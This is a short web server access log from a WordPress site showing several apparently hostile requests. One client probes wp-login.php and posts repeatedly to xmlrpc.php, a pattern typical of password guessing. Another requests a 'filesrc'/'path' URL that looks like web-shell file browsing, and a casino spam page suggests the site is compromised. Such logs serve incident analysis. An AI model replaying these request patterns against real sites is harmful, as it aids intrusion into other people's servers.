48.218.168.20 - - [07/Apr/2026:10:20:03 -0700] "GET /wp-login.php?option&path=/home/kq22obq8vxga/public_html HTTP/1.0" 302 1233 "https://beemunch.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 1958 **1/1958492**
48.218.168.20 - - [07/Apr/2026:10:20:06 -0700] "GET /wp-login.php?checkemail=registered HTTP/1.0" 200 3027 "https://beemunch.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 1981 **1/1981929**
48.218.168.20 - - [07/Apr/2026:10:20:08 -0700] "GET /xmlrpc.php HTTP/1.0" 200 3055 "https://beemunch.com/wp-login.php?checkemail=registered" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 2780 **2/2780991**
48.218.168.20 - - [07/Apr/2026:10:20:12 -0700] "POST /xmlrpc.php HTTP/1.0" 200 3176 "https://beemunch.com/xmlrpc.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 3016 **3/3016634**
48.218.168.20 - - [07/Apr/2026:10:20:15 -0700] "POST /xmlrpc.php HTTP/1.0" 200 3187 "https://beemunch.com/xmlrpc.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 2469 **2/2469801**
48.218.168.20 - - [07/Apr/2026:10:20:19 -0700] "GET /wp-login.php?checkemail=registered HTTP/1.0" 200 3029 "https://beemunch.com/xmlrpc.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 1964 **1/1964321**
43.157.158.178 - - [07/Apr/2026:10:21:54 -0700] "GET /?filesrc=/home/kq22obq8vxga/public_html/readme.html&path=/home/kq22obq8vxga/public_html HTTP/1.1" 200 28220 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 3467 **3/3467114**
216.244.66.248 - - [07/Apr/2026:10:22:49 -0700] "GET /play-live-blackjack-game-for-real-money-download-apk-experience-online-casino-in-english-for-india/ HTTP/1.1" 200 379551 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 8342 **8/8342711**
